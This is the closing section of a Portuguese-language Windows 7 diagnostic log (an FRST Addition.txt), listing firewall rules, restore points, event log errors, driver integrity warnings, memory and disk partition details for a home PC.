FirewallRules: [{86D35711-5D7B-472C-9587-02669F9F066B}] => (Allow) C:\Users\Familha\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{5E86E036-A20A-4B51-9F18-322417E5D1C0}] => (Allow) C:\Users\Familha\AppData\Local\Chromium\Application\chrome.exe
FirewallRules: [{00BE685A-6248-4CB6-96A5-81BDF5E7AB70}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
==================== Pontos de Restauração =========================
25-09-2016 14:33:27 Ponto de Verificação Agendado
02-10-2016 22:19:46 Ponto de Verificação Agendado
14-10-2016 00:30:02 Ponto de Verificação Agendado
21-10-2016 14:13:23 Ponto de Verificação Agendado
25-10-2016 15:29:59 Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.23506
25-10-2016 15:34:02 DirectX instalado
25-10-2016 15:43:49 Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.23918
25-10-2016 15:55:57 Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.23918
25-10-2016 16:08:01 Windows Update
==================== Dispositivos Apresentando Falhas No Gerenciador =============
==================== Erros no Log de eventos: =========================
Erros em Aplicativos:
==================
Error: (08/10/2016 07:23:21 PM) (Source: MsiInstaller) (EventID: 11500) (User: Familha-PC)
Description: Produto: Intel(R) Smart Connect Technology 2.0 x64 -- Erro 1500. Outra instalação está em andamento. Você deve concluir a instalação anterior antes de continuar a instalação atual.
Error: (08/10/2016 07:20:40 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Falha na geração de contexto de ativação para "C:\PROGRA~1\MICROS~2\Office14\GROOVEEX.DLL".
Assembly dependente Microsoft.VC90.ATL,processorArchitecture="amd64",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="9.0.21022.08" não pôde ser localizado.
Use o arquivo sxstrace.exe para obter um diagnóstico detalhado.
Error: (08/10/2016 07:20:39 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Falha na geração de contexto de ativação para "C:\PROGRA~1\MICROS~2\Office14\GROOVEEX.DLL".
Assembly dependente Microsoft.VC90.ATL,processorArchitecture="amd64",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="9.0.21022.08" não pôde ser localizado.
Use o arquivo sxstrace.exe para obter um diagnóstico detalhado.
Error: (08/10/2016 07:20:39 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Falha na geração de contexto de ativação para "C:\PROGRA~1\MICROS~2\Office14\GROOVEEX.DLL".
Assembly dependente Microsoft.VC90.ATL,processorArchitecture="amd64",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="9.0.21022.08" não pôde ser localizado.
Use o arquivo sxstrace.exe para obter um diagnóstico detalhado.
Error: (08/10/2016 07:20:31 PM) (Source: SideBySide) (EventID: 33) (User: )
Description: Falha na geração de contexto de ativação para "C:\PROGRA~1\MICROS~2\Office14\GROOVEEX.DLL".
Assembly dependente Microsoft.VC90.ATL,processorArchitecture="amd64",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="9.0.21022.08" não pôde ser localizado.
Use o arquivo sxstrace.exe para obter um diagnóstico detalhado.
Error: (08/10/2016 04:46:01 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 257) (User: )
Description: Falha dos Serviços de Criptografia ao inicializar o Catálogo do Banco de Dados. Erro do ESENT:-546.
Error: (08/10/2016 04:46:01 PM) (Source: ESENT) (EventID: 412) (User: )
Description: Catalog Database (320) Catalog Database: Não é possível ler o cabeçalho do arquivo de log C:\Windows\system32\CatRoot2\edb.log. Erro -546.
Error: (08/10/2016 04:46:01 PM) (Source: ESENT) (EventID: 412) (User: )
Description: Catalog Database (320) Catalog Database: Não é possível ler o cabeçalho do arquivo de log C:\Windows\system32\CatRoot2\edb.log. Erro -546.
Erros de Sistema:
=============
Error: (10/21/2016 05:22:24 PM) (Source: Service Control Manager) (EventID: 7011) (User: )
Description: Tempo limite esgotado (30000 milissegundos) ao aguardar a resposta de uma transação do serviço ShellHWDetection.
Error: (10/08/2016 12:17:29 AM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: O serviço Central de Segurança terminou com o erro:
Serviço de autenticação desconhecido.
Error: (10/07/2016 08:37:50 PM) (Source: Service Control Manager) (EventID: 7011) (User: )
Description: Tempo limite esgotado (30000 milissegundos) ao aguardar a resposta de uma transação do serviço defragsvc.
Error: (10/07/2016 08:37:19 PM) (Source: Tcpip) (EventID: 4199) (User: )
Description: O sistema detectou um conflito de endereço entre o endereço IP 192.168.1.100 e o sistema
que possui o endereço de hardware de rede 64-89-9A-05-C1-0D. Como resultado desse conflito, as operações de rede nesse sistema podem ser
interrompidas.
Error: (10/03/2016 05:43:50 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: O serviço The Free Weather Service foi encerrado inesperadamente. Isso aconteceu 1 vez(es).
Error: (09/26/2016 10:44:21 PM) (Source: NetBT) (EventID: 4321) (User: )
Description: O nome "FAMILHA-PC :0" não pôde ser registrado na interface com o endereço IP 192.168.1.105.
O computador de endereço IP 192.168.1.107 não permitiu que o nome fosse reivindicado por
este computador.
Error: (09/26/2016 10:44:20 PM) (Source: NetBT) (EventID: 4321) (User: )
Description: O nome "FAMILHA-PC :20" não pôde ser registrado na interface com o endereço IP 192.168.1.105.
O computador de endereço IP 192.168.1.107 não permitiu que o nome fosse reivindicado por
este computador.
Error: (09/26/2016 10:44:20 PM) (Source: Server) (EventID: 2505) (User: )
Description: O servidor não pôde ligar-se com o transporte \Device\NetBT_Tcpip_{1B10FE05-4B51-4620-A013-6B42E2B10A99} porque outro computador na rede tem o mesmo nome. Não foi possível iniciar o servidor.
Error: (09/20/2016 04:36:13 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Não foi possível iniciar o serviço aswHdsKe devido ao seguinte erro:
O Windows não pode verificar a assinatura digital deste arquivo. Talvez uma alteração recente de hardware ou software tenha instalado um arquivo com uma assinatura incorreta ou danificado, ou talvez o arquivo seja um software mal-intencionado de origem desconhecida.
Error: (09/11/2016 07:06:41 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Não foi possível iniciar o serviço Serviço de Descoberta Automática de Proxy da Web do WinHTTP devido ao seguinte erro:
Não foi possível iniciar o serviço devido a uma falha de logon.
CodeIntegrity:
===================================
Date: 2016-09-20 15:36:13.317
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\aswHdsKe.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
Date: 2016-09-20 15:36:13.316
Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\aswHdsKe.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
==================== Informações da Memória ===========================
Processador: Intel(R) Pentium(R) CPU G645 @ 2.90GHz
Percentagem de memória em uso: 44%
RAM física total: 3792.59 MB
RAM física disponível: 2100.44 MB
Virtual Total: 7583.34 MB
Virtual disponível: 5890.59 MB
==================== Drives ================================
Drive c: (Win7 64bts) (Fixed) (Total:465.66 GB) (Free:391.04 GB) NTFS
==================== MBR & Tabela de Partições ==================
========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 465.8 GB) (Disk ID: 219800DD)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=465.7 GB) - (Type=07 NTFS)
==================== Fim de Addition.txt ============================